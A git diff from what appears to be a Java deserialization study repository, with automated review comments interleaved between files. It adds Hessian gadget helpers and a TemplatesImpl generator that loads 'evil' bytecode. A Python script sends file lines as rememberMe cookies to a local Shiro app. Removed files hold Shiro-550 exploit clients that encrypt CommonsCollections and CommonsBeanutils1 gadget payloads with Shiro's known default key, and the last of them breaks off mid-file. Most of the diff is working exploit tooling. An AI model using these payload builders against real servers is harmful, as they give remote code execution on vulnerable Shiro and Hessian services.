+ public static byte[] hessian2Ser2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ Hessian2Output hessian2Output = new Hessian2Output(baos);
+
+ SerializerFactory serializerFactory = new SerializerFactory();
+ serializerFactory.setAllowNonSerializable(true);
+ hessian2Output.setSerializerFactory(serializerFactory);
+
+ hessian2Output.writeObject(obj);
+ hessian2Output.close();
+ return baos.toByteArray();
+ }
+
+ public static Object hessian2Deser(byte[] bytes) throws IOException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ Hessian2Input hessian2Input = new Hessian2Input(bais);
+ Object o = hessian2Input.readObject();
+ hessian2Input.close();
+ return o;
+ }
+
+ public static byte[] hessianSer2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ HessianOutput hessianOutput = new HessianOutput(baos);
+
+ SerializerFactory serializerFactory = new SerializerFactory();
+ serializerFactory.setAllowNonSerializable(true);
+ hessianOutput.setSerializerFactory(serializerFactory);
+
+ hessianOutput.writeObject(obj);
+ hessianOutput.close();
+ return baos.toByteArray();
+ }
+
+ public static Object hessianDeser(byte[] bytes) throws IOException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ HessianInput hessianInput = new HessianInput(bais);
+ Object o = hessianInput.readObject();
+ hessianInput.close();
+ return o;
+ }
+}
diff --git a/hessian/src/main/java/tools/IOTools.java b/hessian/src/main/java/tools/IOTools.java
new file mode 100644
index 0000000..46d0567
--- /dev/null
+++ b/hessian/src/main/java/tools/IOTools.java
@@ -0,0 +1,12 @@
+package tools;
+
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class IOTools {
+ public static byte[] readFile(String fileName) throws IOException {
+ byte[] bytes = Files.readAllBytes(Paths.get(fileName));
+ return bytes;
+ }
+}
diff --git a/hessian/src/main/java/tools/InvocationHandlerImpl.java b/hessian/src/main/java/tools/InvocationHandlerImpl.java
new file mode 100644
index 0000000..7c15d95
--- /dev/null
+++ b/hessian/src/main/java/tools/InvocationHandlerImpl.java
@@ -0,0 +1,19 @@
+package tools;
+
+import java.io.Serializable;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+
+// 动态代理,实现对象接口转化
+public class InvocationHandlerImpl implements InvocationHandler, Serializable {
+ private Object object;
+
+ public InvocationHandlerImpl(Object obj) {
+ this.object = obj;
+ }
+
+ @Override
+ public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
+ return null;
+ }
+}
diff --git a/hessian/src/main/java/tools/Payload.java b/hessian/src/main/java/tools/Payload.java
new file mode 100644
index 0000000..5396724
--- /dev/null
+++ b/hessian/src/main/java/tools/Payload.java
@@ -0,0 +1,10 @@
+package tools;
+
+public abstract class Payload {
+// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception {
+// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath);
+// return templates;
+// }
+
+ public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception;
+}
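Review bot: `hessian2Deser` and `hessianDeser` hand caller-supplied bytes to `Hessian2Input`/`HessianInput.readObject()` with the library's default factory and no class restriction, so they are unrestricted deserialization sinks; a header comment such as `// Deserialization sink for the study: only feed it bytes produced by the *Ser* helpers in this class.` would stop a later reader from reusing them on data from outside the process. In all five methods the `close()` call is skipped when `writeObject`/`readObject` throws; moving it into a `finally` block (or try-with-resources if these types are `Closeable` in the Hessian version used — check the dependency) fixes that. `baos.write(67);` in `hessian2ToStringSer` is an unexplained magic byte; the intent of prepending it should be stated in a comment next to the call.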
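Review bot: `invoke` in `InvocationHandlerImpl` unconditionally returns `null` and never reads the `object` field that the constructor stores, so the class comment ("动态代理,实现对象接口转化" — dynamic proxy adapting an object to an interface) describes behaviour the code does not have, and a proxy built on it will throw `NullPointerException` for any interface method with a primitive return type. If this is a deliberate placeholder, say so in the comment and drop the unused field (`// Stub handler: invoke() intentionally returns null; the wrapped object is not used yet.`); otherwise the comment should be updated to match whatever the handler is meant to do.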
diff --git a/hessian/src/main/java/tools/ReflectTools.java b/hessian/src/main/java/tools/ReflectTools.java
new file mode 100644
index 0000000..f8e30a9
--- /dev/null
+++ b/hessian/src/main/java/tools/ReflectTools.java
@@ -0,0 +1,200 @@
+package tools;
+
+import javassist.CannotCompileException;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtField;
+
+import java.io.*;
+import java.lang.reflect.Array;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.Modifier;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.concurrent.ConcurrentHashMap;
+
+public class ReflectTools {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException {
+ Class aClass = obj.getClass();
+ Field field = null;
+ while (aClass != null){
+ try {
+ field = aClass.getDeclaredField(fieldName);
+ break;
+ } catch (NoSuchFieldException e) {
+ aClass = aClass.getSuperclass();
+ }
+ }
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ // 修改static final 字段
+ public static void setFinalField(Object object, String fieldName, Object newValue) throws Exception {
+ // 获取指定类的 Class 对象
+ Class clazz = object.getClass();
+
+ // 获取 private final 字段
+ Field field = clazz.getDeclaredField(fieldName);
+
+ // 使私有字段可以访问
+ field.setAccessible(true);
+
+ // 移除 final 修饰符
+ Field modifiersField = Field.class.getDeclaredField("modifiers");
+ modifiersField.setAccessible(true);
+ modifiersField.setInt(field, field.getModifiers() & ~java.lang.reflect.Modifier.FINAL);
+
+ // 修改字段的值
+ field.set(object, newValue);
+ }
+
+ public static Object getFieldValue(Object obj, String fieldName) throws NoSuchFieldException, IllegalAccessException {
+ Class aClass = obj.getClass();
+
+ while (aClass != null){
+ try{
+ Field declaredField = aClass.getDeclaredField(fieldName);
+ declaredField.setAccessible(true);
+ return declaredField.get(obj);
+ }catch(NoSuchFieldException e){
+ aClass = aClass.getSuperclass();
+ }
+ }
+ return null;
+ }
+
+ public static HashMap makeMap (Object v1, Object v2 ) throws Exception {
+ HashMap s = new HashMap<>();
+ setFieldValue(s, "size", 2);
+ Class nodeC;
+ try {
+ nodeC = Class.forName("java.util.HashMap$Node");
+ }
+ catch ( ClassNotFoundException e ) {
+ nodeC = Class.forName("java.util.HashMap$Entry");
+ }
+ Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
+ nodeCons.setAccessible(true);
+ Object tbl = Array.newInstance(nodeC, 2);
+ Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
+ Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
+ setFieldValue(s, "table", tbl);
+ return s;
+ }
+
+ // 制作hash冲突map,实现调用called.equals(param)
+ public static HashMap makeEqualMap(Object called, Object param) throws Exception {
+ HashMap hashMap1 = new HashMap<>();
+ HashMap hashMap2 = new HashMap<>();
+ hashMap1.put("zZ", called);
+ hashMap1.put("yy", param);
+ hashMap2.put("zZ", param);
+ hashMap2.put("yy", called);
+
+ HashMap finalMap = makeMap(hashMap2, hashMap1);
+
+ return finalMap;
+ }
+
+ public static ConcurrentHashMap makeConcurrentMap (Object v1, Object v2 ) throws Exception {
+ ConcurrentHashMap s = new ConcurrentHashMap();
+ setFieldValue(s, "sizeCtl", 2);
+ Class nodeC;
+ try {
+ nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node");
+ }
+ catch ( ClassNotFoundException e ) {
+ nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry");
+ }
+ Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
+ nodeCons.setAccessible(true);
+ Object tbl = Array.newInstance(nodeC, 2);
+ Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
+ Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
+ setFieldValue(s, "table", tbl);
+ Field table = ConcurrentHashMap.class.getDeclaredField("table");
+ table.setAccessible(true);
+ table.set(s, tbl);
+
+ return s;
+ }
+
+ // 生成不继承Serializable接口的Class,防止因suid不一样报错
+ public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass(className);
+
+ if (suid != null) {
+ // 添加 serialVersionUID 字段并指定其值
+ CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass);
+ serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final
+ ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L
+ }
+
+ Class aClass = ctClass.toClass();
+ return aClass;
+ }
+
+ // 用于在HashMap中制造hash碰撞,从而触发equals,用于XString系列的equals触发;有时会失败,如XBean链,原因未知
+ public static String unhash ( int hash ) {
+ int target = hash;
+ StringBuilder answer = new StringBuilder();
+ if ( target < 0 ) {
+ // String with hash of Integer.MIN_VALUE, 0x80000000
+ answer.append("\u0915\u0009\u001e\u000c\u0002");
+
+ if ( target == Integer.MIN_VALUE )
+ return answer.toString();
+ // Find target without sign bit set
+ target = target & Integer.MAX_VALUE;
+ }
+
+ unhash0(answer, target);
+ return answer.toString();
+ }
+ private static void unhash0 ( StringBuilder partial, int target ) {
+ int div = target / 31;
+ int rem = target % 31;
+
+ if ( div <= Character.MAX_VALUE ) {
+ if ( div != 0 )
+ partial.append((char) div);
+ partial.append((char) rem);
+ }
+ else {
+ unhash0(partial, div);
+ partial.append((char) rem);
+ }
+ }
+
+
+ public static byte[] ser2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(obj);
+ return baos.toByteArray();
+ }
+
+ public static void ser2file(Object obj, String fileName) throws IOException {
+ FileOutputStream fos = new FileOutputStream(fileName);
+ ObjectOutputStream oos = new ObjectOutputStream(fos);
+ oos.writeObject(obj);
+ }
+
+ public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException {
+ if (bytes != null) {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ ObjectInputStream ois = new ObjectInputStream(bais);
+ return ois.readObject();
+ }else {
+ byte[] decode = Base64.getDecoder().decode(base64);
+ ByteArrayInputStream bais = new ByteArrayInputStream(decode);
+ ObjectInputStream ois = new ObjectInputStream(bais);
+ return ois.readObject();
+ }
+ }
+
+
+}
diff --git a/hessian/src/main/java/tools/TemplatesGen.java b/hessian/src/main/java/tools/TemplatesGen.java
new file mode 100644
index 0000000..ccf9bac
--- /dev/null
+++ b/hessian/src/main/java/tools/TemplatesGen.java
@@ -0,0 +1,34 @@
+package tools;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import javassist.CannotCompileException;
+import javassist.ClassPool;
+import javassist.CtClass;
+
+import javax.xml.transform.Templates;
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class TemplatesGen {
+ public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException {
+ byte[] evilBytes;
+ if (byteCode != null) {
+ evilBytes = byteCode;
+ }else {
+ evilBytes = Files.readAllBytes(Paths.get(bytePath));
+ }
+ TemplatesImpl templates = new TemplatesImpl();
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("useless");
+ byte[] useless = ctClass.toBytecode();
+ ReflectTools.setFieldValue(templates, "_name", "1diot9");
+ ReflectTools.setFieldValue(templates, "_class", null);
+// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
+ ReflectTools.setFieldValue(templates, "_transletIndex", 0);
+ // 修改bytecodes数量和transletIndex,这样就不用继承AbstractTranslet
+ ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless});
+ return templates;
+ }
+
+}
diff --git a/hessian/src/main/java/tools/UnsafeTools.java b/hessian/src/main/java/tools/UnsafeTools.java
new file mode 100644
index 0000000..6579cca
--- /dev/null
+++ b/hessian/src/main/java/tools/UnsafeTools.java
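Review bot: `setFieldValue` dereferences `field` after the `while` loop without checking it, so a field name that exists nowhere in the class hierarchy fails with a bare `NullPointerException` instead of a useful error; add `if (field == null) throw new IllegalArgumentException("no field " + fieldName + " on " + obj.getClass().getName());` before `field.setAccessible(true)` (the sibling `getFieldValue` at least makes the same case explicit by returning `null`). `ser2file` opens a `FileOutputStream` and never closes it, and neither it nor `ser2bytes` closes the `ObjectOutputStream`; try-with-resources on both streams fixes the descriptor leak. `deser` feeds arbitrary `byte[]`/Base64 input into `ObjectInputStream.readObject()` with no `ObjectInputFilter`, which is precisely the sink this repository studies; the method should carry a comment saying so (`// Unrestricted deserialization sink: study helper only, never use on data from outside this process.`), and if it is ever reused outside the lab an allow-list filter via `ObjectInputStream.setObjectInputFilter` (Java 9+) is the mitigation.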
@@ -0,0 +1,15 @@ +package tools; + +import sun.misc.Unsafe; + +import java.lang.reflect.Field; + +public class UnsafeTools { + // 绕过构造方法获取对象 + public static Object getObjectByUnsafe(Class clazz) throws Exception{ + Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe"); + theUnsafe.setAccessible(true); + Unsafe unsafe = (Unsafe) theUnsafe.get(null); + return unsafe.allocateInstance(clazz); + } +} diff --git a/hessian/src/main/java/tools/sinkClass/ToStringClass.java b/hessian/src/main/java/tools/sinkClass/ToStringClass.java new file mode 100644 index 0000000..7169c10 --- /dev/null +++ b/hessian/src/main/java/tools/sinkClass/ToStringClass.java @@ -0,0 +1,15 @@ +package tools.sinkClass; + +import java.io.Serializable; + +public class ToStringClass implements Serializable { + public String toString(){ + System.out.println("toString pwned"); + return "toString pwned"; + } + + public int hashCode(){ + System.out.println("hashCode pwned"); + return 0; + } +} diff --git a/shiro/.idea/shiro.iml b/shiro/.idea/shiro.iml new file mode 100644 index 0000000..79c6a37 --- /dev/null +++ b/shiro/.idea/shiro.iml @@ -0,0 +1,16 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/shiro/python/.idea/python.iml b/shiro/python/.idea/python.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/shiro/python/.idea/python.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/shiro/shiroDeser/BadInterceptor_within.class b/shiro/shiroDeser/BadInterceptor_within.class new file mode 100644 index 0000000..9fc3825 Binary files /dev/null and b/shiro/shiroDeser/BadInterceptor_within.class differ diff --git a/shiro/shiroDeser/Calc.class b/shiro/shiroDeser/Calc.class new file mode 100644 index 0000000..8580c8f Binary files /dev/null and b/shiro/shiroDeser/Calc.class differ 
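Review bot: `toString()` and `hashCode()` in `ToStringClass` override `Object` methods without `@Override`, so a signature typo would silently introduce an overload instead of a compile error; add the annotation to both. The class's purpose — printing when either method is reached — is only implied by the string literals; a header comment such as `// Probe object: prints a marker when toString()/hashCode() are invoked by the code under test.` would make the constant `hashCode` of `0` read as deliberate rather than as a mistake.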
diff --git a/hessian/HessianStudy/utf8.bin b/shiro/shiroDeser/CalcAbs.class similarity index 70% rename from hessian/HessianStudy/utf8.bin rename to shiro/shiroDeser/CalcAbs.class index 21016ad..d22b012 100644 Binary files a/hessian/HessianStudy/utf8.bin and b/shiro/shiroDeser/CalcAbs.class differ diff --git a/shiro/shiroDeser/SimpleInterceptor.class b/shiro/shiroDeser/SimpleInterceptor.class new file mode 100644 index 0000000..7a9bf29 Binary files /dev/null and b/shiro/shiroDeser/SimpleInterceptor.class differ diff --git a/shiro/shiroDeser/SpringEcho.class b/shiro/shiroDeser/SpringEcho.class new file mode 100644 index 0000000..c44500c Binary files /dev/null and b/shiro/shiroDeser/SpringEcho.class differ diff --git a/shiro/shiroDeser/loadClass.class b/shiro/shiroDeser/loadClass.class new file mode 100644 index 0000000..9e3e143 Binary files /dev/null and b/shiro/shiroDeser/loadClass.class differ diff --git a/shiro/shiroDeser/python/enc_dec.py b/shiro/shiroDeser/python/enc_dec.py new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/python/fileWrite.py b/shiro/shiroDeser/python/fileWrite.py new file mode 100644 index 0000000..a0b80fa --- /dev/null +++ b/shiro/shiroDeser/python/fileWrite.py 
@@ -0,0 +1,19 @@ +import requests + + +with open("../fileWrite.txt", "r") as f: + burp0_url = "http://127.0.0.1:8083/home" + + burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", + "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", + "Sec-Fetch-Dest": "document", "sec-ch-ua": "\"Not A(Brand\";v=\"8\", \"Chromium\";v=\"132\"", + "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"Windows\"", + "Referer": "http://127.0.0.1:8083/login?error", "Accept-Encoding": "gzip, deflate, br", + "Connection": "keep-alive"} + for line in f: + burp0_cookies = {"rememberMe": f"{line}"} + resp = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) + print(resp.text) \ No newline at end of file diff --git a/shiro/shiroDeser/src/main/java/com/exp/CB.java b/shiro/shiroDeser/src/main/java/com/exp/CB.java new file mode 100644 index 0000000..a7a6436 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/CB.java @@ -0,0 +1,4 @@ +package com.exp; + +public class CB { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java b/shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java new file mode 100644 index 0000000..37b2b8f --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java @@ -0,0 +1,4 @@ +package com.exp; + +public class ClassByteGen { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java new file mode 100644 index 0000000..df209a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java @@ -0,0 +1,4 @@ +package com.exp; + +public class KeyDetect { +} 
diff --git a/shiro/shiroDeser/src/main/java/com/exp/L.java b/shiro/shiroDeser/src/main/java/com/exp/L.java
new file mode 100644
index 0000000..e01eafc
--- /dev/null
+++ b/shiro/shiroDeser/src/main/java/com/exp/L.java
@@ -0,0 +1,4 @@
+package com.exp;
+
+public class L {
+}
diff --git a/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java
new file mode 100644
index 0000000..81daacd
--- /dev/null
+++ b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java
@@ -0,0 +1,54 @@
+package tools;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class TemplatesGen {
+ public static Templates getTemplates(String bytePath) throws IOException, IllegalAccessException {
+ byte[] bytes = Files.readAllBytes(Paths.get(bytePath));
+ TemplatesImpl templates = new TemplatesImpl();
+ setFieldValue(templates, "_name", "1diot9");
+ setFieldValue(templates, "_class", null);
+ setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
+ setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
+
+ return templates;
+ }
+
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException {
+ Class aClass = obj.getClass();
+ Field field = null;
+ try {
+ field = aClass.getDeclaredField(fieldName);
+ } catch (NoSuchFieldException e) {
+ aClass = aClass.getSuperclass();
+ }
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static byte[] ser2bytes(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(obj);
+ return baos.toByteArray();
+ }
+
+ public static void ser2file(Object obj, String fileName) throws IOException {
+ FileOutputStream fos = new FileOutputStream(fileName);
+ ObjectOutputStream oos = new ObjectOutputStream(fos);
+ oos.writeObject(obj);
+ }
+
+ public static Object deser(byte[] bytes) throws IOException, ClassNotFoundException {
+ ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
+ ObjectInputStream ois = new ObjectInputStream(bais);
+ return ois.readObject();
+ }
+}
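Review bot: This file is added under `shiro/shiroDeser/src/main/java/com/exp/` but its first line declares `package tools;`, so the declaration does not match the directory; Maven and IDE builds flag this, and the sibling `com.exp` stubs added in the same commit cannot refer to it as `com.exp.TemplatesGen`. The first line should read `package com.exp;`. Separately, `setFieldValue` here catches `NoSuchFieldException`, moves `aClass` to its superclass, and then never retries the lookup, so `field` stays `null` and the following `field.setAccessible(true)` throws `NullPointerException` for any inherited field — unlike `tools.ReflectTools.setFieldValue` in this same commit, which loops until it finds the field or runs out of superclasses. `ser2file` also leaves its `FileOutputStream` and `ObjectOutputStream` unclosed, the same leak as in `ReflectTools.ser2file`.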
diff --git a/shiro/shiroDeser/src/main/java/com/exp/WriteFile.java b/shiro/shiroDeser/src/main/java/com/exp/WriteFile.java new file mode 100644 index 0000000..ba99731 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/WriteFile.java @@ -0,0 +1,4 @@ +package com.exp; + +public class WriteFile { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java b/shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java new file mode 100644 index 0000000..ed68afb --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java @@ -0,0 +1,4 @@ +package com.exp; + +public class WriteProperty { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/tmp.java b/shiro/shiroDeser/src/main/java/com/exp/tmp.java new file mode 100644 index 0000000..8c3d2c1 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/tmp.java @@ -0,0 +1,4 @@ +package com.exp; + +public class tmp { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/WebApplication.java b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java new file mode 100644 index 0000000..ebd52a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class WebApplication { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java new file mode 100644 index 0000000..8188334 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class ShiroConfig { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java new file mode 100644 index 0000000..6389c4f --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class UserRealm { +} 
diff --git a/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java new file mode 100644 index 0000000..2a8f913 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class LoginController { +} diff --git a/shiro/shiroDeser/src/main/resources/application.yml b/shiro/shiroDeser/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/src/main/resources/templates/home.html b/shiro/shiroDeser/src/main/resources/templates/home.html new file mode 100644 index 0000000..d6ef988 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/home.html @@ -0,0 +1,10 @@ + + + + Home + + +

Welcome, You are logged in!

+Logout + + diff --git a/shiro/shiroDeser/src/main/resources/templates/login.html b/shiro/shiroDeser/src/main/resources/templates/login.html new file mode 100644 index 0000000..ac0fd72 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/login.html @@ -0,0 +1,14 @@ + + + + Login + + +
+
+
+ +
+

Invalid credentials

+ + diff --git a/shiro/shiroattack/pom.xml b/shiro/shiroattack/pom.xml deleted file mode 100644 index cbf7952..0000000 --- a/shiro/shiroattack/pom.xml +++ /dev/null @@ -1,96 +0,0 @@ - - - - 4.0.0 - - com.govuln - shiroattack - 1.0-SNAPSHOT - - shiroattack - - http://www.example.com - - - UTF-8 - 1.8 - 1.8 - - - - - org.apache.shiro - shiro-core - 1.2.4 - - - - org.javassist - javassist - 3.27.0-GA - - - - commons-collections - commons-collections - 3.2.1 - - - - - - - - - maven-clean-plugin - 3.1.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.8.0 - - - maven-surefire-plugin - 2.22.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - - maven-site-plugin - 3.7.1 - - - maven-project-info-reports-plugin - 3.0.0 - - - - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - - - diff --git a/shiro/shiroattack/shiroattack.iml b/shiro/shiroattack/shiroattack.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/shiro/shiroattack/shiroattack.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java deleted file mode 100644 index 12d86a5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java +++ /dev/null 
@@ -1,20 +0,0 @@ -package com.govuln.shiroattack; - -import javassist.ClassPool; -import javassist.CtClass; -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client { - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); - byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); - - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java deleted file mode 100644 index 177dec5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java +++ /dev/null @@ -1,15 +0,0 @@ -package com.govuln.shiroattack; - -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client0 { - public static void main(String []args) throws Exception { - byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java deleted file mode 100644 index 4f59ed8..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java +++ /dev/null 
@@ -1,20 +0,0 @@ -package com.govuln.shiroattack; - -import javassist.ClassPool; -import javassist.CtClass; -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client1 { - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); - byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode()); - - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java deleted file mode 100644 index d7fcdd4..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java +++ /dev/null 
@@ -1,43 +0,0 @@ -package com.govuln.shiroattack; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import org.apache.commons.beanutils.BeanComparator; - -import java.io.ByteArrayOutputStream; -import java.io.ObjectOutputStream; -import java.lang.reflect.Field; -import java.util.PriorityQueue; - -public class CommonsBeanutils1Shiro { - public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { - Field field = obj.getClass().getDeclaredField(fieldName); - field.setAccessible(true); - field.set(obj, value); - } - - public byte[] getPayload(byte[] clazzBytes) throws Exception { - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); - setFieldValue(obj, "_name", "HelloTemplatesImpl"); - setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); - - final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); - final PriorityQueue queue = new PriorityQueue(2, comparator); - // stub data for replacement later - queue.add("1"); - queue.add("1"); - - setFieldValue(comparator, "property", "outputProperties"); - setFieldValue(queue, "queue", new Object[]{obj, obj}); - - // ================== 